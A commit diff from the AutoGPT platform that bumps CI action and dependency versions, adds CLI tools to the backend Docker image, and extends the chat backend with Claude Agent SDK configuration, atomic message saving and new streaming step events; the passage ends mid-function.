fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY

Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts with http) and api_key are configured. Otherwise fall back to SDK default credentials so direct Anthropic usage still works.
refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
2026-02-12 07:45:14 -05:00 · 2026-02-12 13:37:59 +04:00 · 2026-02-12 13:36:48 +04:00 · 2026-02-12 13:12:42 +04:00 · 2026-02-12 09:10:43 +04:00 · 2026-02-12 08:26:26 +04:00
235 changed files with 22044 additions and 12845 deletions
--- a/.github/workflows/classic-frontend-ci.yml
+++ b/.github/workflows/classic-frontend-ci.yml
@@ -49,7 +49,7 @@ jobs:

      - name: Create PR ${{ env.BUILD_BRANCH }} -> ${{ github.ref_name }}
        if: github.event_name == 'push'
-        uses: peter-evans/create-pull-request@v7
+        uses: peter-evans/create-pull-request@v8
        with:
          add-paths: classic/frontend/build/web
          base: ${{ github.ref_name }}
--- a/.github/workflows/claude-ci-failure-auto-fix.yml
+++ b/.github/workflows/claude-ci-failure-auto-fix.yml
@@ -22,7 +22,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.event.workflow_run.head_branch }}
          fetch-depth: 0
@@ -42,7 +42,7 @@ jobs:

      - name: Get CI failure details
        id: failure_details
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const run = await github.rest.actions.getWorkflowRun({
--- a/.github/workflows/claude-dependabot.yml
+++ b/.github/workflows/claude-dependabot.yml
@@ -30,7 +30,7 @@ jobs:
      actions: read # Required for CI access
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -41,7 +41,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -78,7 +78,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -91,7 +91,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -124,7 +124,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
@@ -309,6 +309,7 @@ jobs:
        uses: anthropics/claude-code-action@v1
        with:
          claude_code_oauth_token: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
+          allowed_bots: "dependabot[bot]"
          claude_args: |
            --allowedTools "Bash(npm:*),Bash(pnpm:*),Bash(poetry:*),Bash(git:*),Edit,Replace,NotebookEditCell,mcp__github_inline_comment__create_inline_comment,Bash(gh pr comment:*), Bash(gh pr diff:*), Bash(gh pr view:*)"
          prompt: |
--- a/.github/workflows/claude.yml
+++ b/.github/workflows/claude.yml
@@ -40,7 +40,7 @@ jobs:
      actions: read # Required for CI access
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -57,7 +57,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -94,7 +94,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -107,7 +107,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -140,7 +140,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -58,7 +58,7 @@ jobs:
        # your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
    steps:
    - name: Checkout repository
-      uses: actions/checkout@v4
+      uses: actions/checkout@v6

    # Initializes the CodeQL tools for scanning.
    - name: Initialize CodeQL
--- a/.github/workflows/copilot-setup-steps.yml
+++ b/.github/workflows/copilot-setup-steps.yml
@@ -27,7 +27,7 @@ jobs:
    # If you do not check out your code, Copilot will do this for you.
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          submodules: true
@@ -39,7 +39,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -76,7 +76,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -89,7 +89,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -132,7 +132,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
--- a/.github/workflows/docs-block-sync.yml
+++ b/.github/workflows/docs-block-sync.yml
@@ -23,7 +23,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -33,7 +33,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/docs-claude-review.yml
+++ b/.github/workflows/docs-claude-review.yml
@@ -23,7 +23,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0

@@ -33,7 +33,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/docs-enhance.yml
+++ b/.github/workflows/docs-enhance.yml
@@ -28,7 +28,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -38,7 +38,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/platform-autogpt-deploy-dev.yaml
+++ b/.github/workflows/platform-autogpt-deploy-dev.yaml
@@ -25,7 +25,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.event.inputs.git_ref || github.ref_name }}

@@ -52,7 +52,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger deploy workflow
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DEPLOY_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
--- a/.github/workflows/platform-autogpt-deploy-prod.yml
+++ b/.github/workflows/platform-autogpt-deploy-prod.yml
@@ -17,7 +17,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.ref_name || 'master' }}

@@ -45,7 +45,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger deploy workflow
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DEPLOY_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
--- a/.github/workflows/platform-backend-ci.yml
+++ b/.github/workflows/platform-backend-ci.yml
@@ -68,7 +68,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          submodules: true
@@ -88,7 +88,7 @@ jobs:
        run: echo "date=$(date +'%Y-%m-%d')" >> $GITHUB_OUTPUT

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/platform-dev-deploy-event-dispatcher.yml
+++ b/.github/workflows/platform-dev-deploy-event-dispatcher.yml
@@ -17,7 +17,7 @@ jobs:
      - name: Check comment permissions and deployment status
        id: check_status
        if: github.event_name == 'issue_comment' && github.event.issue.pull_request
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const commentBody = context.payload.comment.body.trim();
@@ -55,7 +55,7 @@ jobs:

      - name: Post permission denied comment
        if: steps.check_status.outputs.permission_denied == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -68,7 +68,7 @@ jobs:
      - name: Get PR details for deployment
        id: pr_details
        if: steps.check_status.outputs.should_deploy == 'true' || steps.check_status.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const pr = await github.rest.pulls.get({
@@ -82,7 +82,7 @@ jobs:
          
      - name: Dispatch Deploy Event
        if: steps.check_status.outputs.should_deploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -98,7 +98,7 @@ jobs:

      - name: Post deploy success comment
        if: steps.check_status.outputs.should_deploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -110,7 +110,7 @@ jobs:

      - name: Dispatch Undeploy Event (from comment)
        if: steps.check_status.outputs.should_undeploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -126,7 +126,7 @@ jobs:

      - name: Post undeploy success comment
        if: steps.check_status.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -139,7 +139,7 @@ jobs:
      - name: Check deployment status on PR close
        id: check_pr_close
        if: github.event_name == 'pull_request' && github.event.action == 'closed'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const comments = await github.rest.issues.listComments({
@@ -168,7 +168,7 @@ jobs:
          github.event_name == 'pull_request' &&
          github.event.action == 'closed' &&
          steps.check_pr_close.outputs.should_undeploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -187,7 +187,7 @@ jobs:
          github.event_name == 'pull_request' &&
          github.event.action == 'closed' &&
          steps.check_pr_close.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
--- a/.github/workflows/platform-frontend-ci.yml
+++ b/.github/workflows/platform-frontend-ci.yml
@@ -31,7 +31,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Check for component changes
        uses: dorny/paths-filter@v3
@@ -42,7 +42,7 @@ jobs:
              - 'autogpt_platform/frontend/src/components/**'

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -54,7 +54,7 @@ jobs:
        run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT

      - name: Cache dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ steps.cache-key.outputs.key }}
@@ -71,10 +71,10 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -82,7 +82,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -107,12 +107,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -120,7 +120,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -148,12 +148,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -176,7 +176,7 @@ jobs:
        uses: docker/setup-buildx-action@v3

      - name: Cache Docker layers
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: /tmp/.buildx-cache
          key: ${{ runner.os }}-buildx-frontend-test-${{ hashFiles('autogpt_platform/docker-compose.yml', 'autogpt_platform/backend/Dockerfile', 'autogpt_platform/backend/pyproject.toml', 'autogpt_platform/backend/poetry.lock') }}
@@ -231,7 +231,7 @@ jobs:
          fi

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -277,12 +277,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -290,7 +290,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
--- a/.github/workflows/platform-fullstack-ci.yml
+++ b/.github/workflows/platform-fullstack-ci.yml
@@ -29,10 +29,10 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -44,7 +44,7 @@ jobs:
        run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT

      - name: Cache dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ steps.cache-key.outputs.key }}
@@ -56,19 +56,19 @@ jobs:
        run: pnpm install --frozen-lockfile

  types:
-    runs-on: ubuntu-latest
+    runs-on: big-boi
    needs: setup
    strategy:
      fail-fast: false

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -85,10 +85,10 @@ jobs:

      - name: Run docker compose
        run: |
-          docker compose -f ../docker-compose.yml --profile local --profile deps_backend up -d
+          docker compose -f ../docker-compose.yml --profile local up -d deps_backend

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
--- a/.github/workflows/repo-workflow-checker.yml
+++ b/.github/workflows/repo-workflow-checker.yml
@@ -11,7 +11,7 @@ jobs:
    steps:
      # - name: Wait some time for all actions to start
      #   run: sleep 30
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v6
        # with:
          # fetch-depth: 0
      - name: Set up Python
--- a/autogpt_platform/autogpt_libs/poetry.lock
+++ b/autogpt_platform/autogpt_libs/poetry.lock
--- a/autogpt_platform/autogpt_libs/pyproject.toml
+++ b/autogpt_platform/autogpt_libs/pyproject.toml
@@ -9,25 +9,25 @@ packages = [{ include = "autogpt_libs" }]
 [tool.poetry.dependencies]
 python = ">=3.10,<4.0"
 colorama = "^0.4.6"
-cryptography = "^45.0"
+cryptography = "^46.0"
 expiringdict = "^1.2.2"
-fastapi = "^0.116.1"
-google-cloud-logging = "^3.12.1"
-launchdarkly-server-sdk = "^9.12.0"
-pydantic = "^2.11.7"
-pydantic-settings = "^2.10.1"
-pyjwt = { version = "^2.10.1", extras = ["crypto"] }
+fastapi = "^0.128.0"
+google-cloud-logging = "^3.13.0"
+launchdarkly-server-sdk = "^9.14.1"
+pydantic = "^2.12.5"
+pydantic-settings = "^2.12.0"
+pyjwt = { version = "^2.11.0", extras = ["crypto"] }
 redis = "^6.2.0"
-supabase = "^2.16.0"
-uvicorn = "^0.35.0"
+supabase = "^2.27.2"
+uvicorn = "^0.40.0"

 [tool.poetry.group.dev.dependencies]
-pyright = "^1.1.404"
+pyright = "^1.1.408"
 pytest = "^8.4.1"
-pytest-asyncio = "^1.1.0"
-pytest-mock = "^3.14.1"
-pytest-cov = "^6.2.1"
-ruff = "^0.12.11"
+pytest-asyncio = "^1.3.0"
+pytest-mock = "^3.15.1"
+pytest-cov = "^7.0.0"
+ruff = "^0.15.0"

 [build-system]
 requires = ["poetry-core"]
--- a/autogpt_platform/backend/Dockerfile
+++ b/autogpt_platform/backend/Dockerfile
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
    DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH

-# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
+# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
+# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
 RUN apt-get update && apt-get install -y \
    python3.13 \
    python3-pip \
    ffmpeg \
    imagemagick \
+    jq \
+    ripgrep \
+    tree \
    && rm -rf /var/lib/apt/lists/*

 # Copy only necessary files from builder
--- a/autogpt_platform/backend/backend/api/features/chat/config.py
+++ b/autogpt_platform/backend/backend/api/features/chat/config.py
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
    session_ttl: int = Field(default=43200, description="Session TTL in seconds")

    # Streaming Configuration
-    max_context_messages: int = Field(
-        default=50, ge=1, le=200, description="Maximum context messages"
-    )
-
    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(default=3, description="Maximum number of retries")
+    max_retries: int = Field(
+        default=3,
+        description="Max retries for fallback path (SDK handles retries internally)",
+    )
    max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
    max_agent_schedules: int = Field(
        default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,33 @@ class ChatConfig(BaseSettings):
        description="Name of the prompt in Langfuse to fetch",
    )

+    # Claude Agent SDK Configuration
+    use_claude_agent_sdk: bool = Field(
+        default=True,
+        description="Use Claude Agent SDK for chat completions",
+    )
+    claude_agent_model: str | None = Field(
+        default=None,
+        description="Model for the Claude Agent SDK path. If None, derives from "
+        "the `model` field by stripping the OpenRouter provider prefix.",
+    )
+    claude_agent_max_budget_usd: float | None = Field(
+        default=None,
+        gt=0,
+        description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
+    )
+    claude_agent_max_buffer_size: int = Field(
+        default=10 * 1024 * 1024,  # 10MB (SDK default is 1MB)
+        description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
+        "Increase if tool outputs exceed the limit.",
+    )
+
+    # Extended thinking configuration for Claude models
+    thinking_enabled: bool = Field(
+        default=True,
+        description="Enable adaptive thinking for Claude models via OpenRouter",
+    )
+
    @field_validator("api_key", mode="before")
    @classmethod
    def get_api_key(cls, v):
@@ -132,6 +158,17 @@ class ChatConfig(BaseSettings):
            v = os.getenv("CHAT_INTERNAL_API_KEY")
        return v

+    @field_validator("use_claude_agent_sdk", mode="before")
+    @classmethod
+    def get_use_claude_agent_sdk(cls, v):
+        """Resolve use_claude_agent_sdk; CHAT_USE_CLAUDE_AGENT_SDK wins when set."""
+        # A non-empty environment variable takes precedence over the provided value
+        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
+        if env_val:
+            return env_val in ("true", "1", "yes", "on")
+        # Default to True (SDK enabled by default)
+        return True if v is None else v
+
    # Prompt paths for different contexts
    PROMPT_PATHS: dict[str, str] = {
        "default": "prompts/chat_system.md",
--- a/autogpt_platform/backend/backend/api/features/chat/db.py
+++ b/autogpt_platform/backend/backend/api/features/chat/db.py
@@ -45,10 +45,7 @@ async def create_chat_session(
        successfulAgentRuns=SafeJson({}),
        successfulAgentSchedules=SafeJson({}),
    )
-    return await PrismaChatSession.prisma().create(
-        data=data,
-        include={"Messages": True},
-    )
+    return await PrismaChatSession.prisma().create(data=data)


 async def update_chat_session(
--- a/autogpt_platform/backend/backend/api/features/chat/model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model.py
@@ -273,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
    try:
        session = ChatSession.model_validate_json(raw_session)
        logger.info(
-            f"Loading session {session_id} from cache: "
-            f"message_count={len(session.messages)}, "
-            f"roles={[m.role for m in session.messages]}"
+            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
+            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
        )
        return session
    except Exception as e:
@@ -317,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
        return None

    messages = prisma_session.Messages
-    logger.info(
-        f"Loading session {session_id} from DB: "
-        f"has_messages={messages is not None}, "
-        f"message_count={len(messages) if messages else 0}, "
-        f"roles={[m.role for m in messages] if messages else []}"
+    logger.debug(
+        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
+        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
    )

    return ChatSession.from_db(prisma_session, messages)
@@ -372,10 +369,9 @@ async def _save_session_to_db(
                    "function_call": msg.function_call,
                }
            )
-        logger.info(
-            f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
-            f"roles={[m['role'] for m in messages_data]}, "
-            f"start_sequence={existing_message_count}"
+        logger.debug(
+            f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
+            f"roles={[m['role'] for m in messages_data]}"
        )
        await chat_db.add_chat_messages_batch(
            session_id=session.session_id,
@@ -415,7 +411,7 @@ async def get_chat_session(
        logger.warning(f"Unexpected cache error for session {session_id}: {e}")

    # Fall back to database
-    logger.info(f"Session {session_id} not in cache, checking database")
+    logger.debug(f"Session {session_id} not in cache, checking database")
    session = await _get_session_from_db(session_id)

    if session is None:
@@ -432,7 +428,6 @@ async def get_chat_session(
    # Cache the session from DB
    try:
        await _cache_session(session)
-        logger.info(f"Cached session {session_id} from database")
    except Exception as e:
        logger.warning(f"Failed to cache session {session_id}: {e}")

@@ -497,6 +492,40 @@ async def upsert_chat_session(
        return session


+async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
+    """Atomically append a message to a session and persist it.
+
+    Acquires the session lock, re-fetches the latest session state,
+    appends the message, and saves — preventing message loss when
+    concurrent requests modify the same session.
+    """
+    lock = await _get_session_lock(session_id)
+
+    async with lock:
+        session = await get_chat_session(session_id)
+        if session is None:
+            raise ValueError(f"Session {session_id} not found")
+
+        session.messages.append(message)
+        existing_message_count = await chat_db.get_chat_session_message_count(
+            session_id
+        )
+
+        try:
+            await _save_session_to_db(session, existing_message_count)
+        except Exception as e:
+            raise DatabaseError(
+                f"Failed to persist message to session {session_id}"
+            ) from e
+
+        try:
+            await _cache_session(session)
+        except Exception as e:
+            logger.warning(f"Cache write failed for session {session_id}: {e}")
+
+        return session
+
+
 async def create_chat_session(user_id: str) -> ChatSession:
    """Create a new chat session and persist it.

@@ -603,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
            logger.warning(f"Session {session_id} not found for title update")
            return False

-        # Invalidate cache so next fetch gets updated title
+        # Update title in cache if it exists (instead of invalidating).
+        # This prevents race conditions where cache invalidation causes
+        # the frontend to see stale DB data while streaming is still in progress.
        try:
-            redis_key = _get_session_cache_key(session_id)
-            async_redis = await get_redis_async()
-            await async_redis.delete(redis_key)
+            cached = await _get_session_from_cache(session_id)
+            if cached:
+                cached.title = title
+                await _cache_session(cached)
        except Exception as e:
-            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
+            # Not critical - title will be correct on next full cache refresh
+            logger.warning(
+                f"Failed to update title in cache for session {session_id}: {e}"
+            )

        return True
    except Exception as e:
--- a/autogpt_platform/backend/backend/api/features/chat/response_model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/response_model.py
@@ -10,6 +10,8 @@ from typing import Any

 from pydantic import BaseModel, Field

+from backend.util.json import dumps as json_dumps
+

 class ResponseType(str, Enum):
    """Types of streaming responses following AI SDK protocol."""
@@ -18,6 +20,10 @@ class ResponseType(str, Enum):
    START = "start"
    FINISH = "finish"

+    # Step lifecycle (one LLM API call within a message)
+    START_STEP = "start-step"
+    FINISH_STEP = "finish-step"
+
    # Text streaming
    TEXT_START = "text-start"
    TEXT_DELTA = "text-delta"
@@ -57,6 +63,16 @@ class StreamStart(StreamBaseResponse):
        description="Task ID for SSE reconnection. Clients can reconnect using GET /tasks/{taskId}/stream",
    )

+    def to_sse(self) -> str:
+        """Convert to SSE format, excluding non-protocol fields like taskId."""
+        # Serialize with the module-level json_dumps helper (as StreamError.to_sse
+        # does) rather than re-importing the stdlib json module on every call.
+        data: dict[str, Any] = {
+            "type": self.type.value,
+            "messageId": self.messageId,
+        }
+        return f"data: {json_dumps(data)}\n\n"
+

 class StreamFinish(StreamBaseResponse):
    """End of message/stream."""
@@ -64,6 +80,26 @@ class StreamFinish(StreamBaseResponse):
    type: ResponseType = ResponseType.FINISH


+class StreamStartStep(StreamBaseResponse):
+    """Start of a step (one LLM API call within a message).
+
+    The AI SDK uses this to add a step-start boundary to message.parts,
+    enabling visual separation between multiple LLM calls in a single message.
+    """
+
+    type: ResponseType = ResponseType.START_STEP
+
+
+class StreamFinishStep(StreamBaseResponse):
+    """End of a step (one LLM API call within a message).
+
+    The AI SDK uses this to reset activeTextParts and activeReasoningParts,
+    so the next LLM call in a tool-call continuation starts with clean state.
+    """
+
+    type: ResponseType = ResponseType.FINISH_STEP
+
+
 # ========== Text Streaming ==========


@@ -117,7 +153,7 @@ class StreamToolOutputAvailable(StreamBaseResponse):
    type: ResponseType = ResponseType.TOOL_OUTPUT_AVAILABLE
    toolCallId: str = Field(..., description="Tool call ID this responds to")
    output: str | dict[str, Any] = Field(..., description="Tool execution output")
-    # Additional fields for internal use (not part of AI SDK spec but useful)
+    # Keep these for internal backend use
    toolName: str | None = Field(
        default=None, description="Name of the tool that was executed"
    )
@@ -125,6 +161,17 @@ class StreamToolOutputAvailable(StreamBaseResponse):
        default=True, description="Whether the tool execution succeeded"
    )

+    def to_sse(self) -> str:
+        """Convert to SSE format, excluding non-spec fields."""
+        # Fields kept for internal backend use (e.g. toolName) are omitted.
+        # Serialize with the shared json_dumps helper, as StreamError.to_sse does.
+        data = {
+            "type": self.type.value,
+            "toolCallId": self.toolCallId,
